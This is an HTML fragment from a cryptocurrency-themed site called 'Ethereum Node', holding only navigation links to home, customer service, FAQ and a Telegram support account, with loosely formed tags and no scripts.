      <!--<p style="font-size: 9.50px;"><b style="color: hsla(0, 0%, 0%, 0.8)"> ETHEREUM</b><b style="font-size: 6px">NODE</b> <b class="bb1"><span class="span11"style="color: hsla(0, 0%, 0%, 0.8)"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;CONTACTS</b>  </p> </a></b>
      
      <section style="font-size: 9px;"><span style="color: hsla(0, 0%, 0%, 0.8)">    
       <a href="#"style="text-decoration: none; color: hsla(0, 0%, 0%, 0.8)">  
       Home</a></span><span class="bb2">     <a href="indexcustomerservice.html"style="text-decoration: none;"> <span style="color: hsla(0, 0%, 0%, 0.8)">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Customer service</span></a>
      <section style="font-size: 9px;">     <a href="##"style="text-decoration: none;"> <span style="color: hsla(0, 0%, 0%, 0.8)"> FAQ</span></a><span class="bb2">     <a href="   https://t.me/Ethereumnode_Customer_Service"style="text-decoration: none;"> <span style="color: hsla(0, 0%, 0%, 0.8)">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Telegram link </span>
    
      


      
      
      </a></span>
      
      
      
      
      

   
    
   


              
  
  </body>
  </html>
  
  
  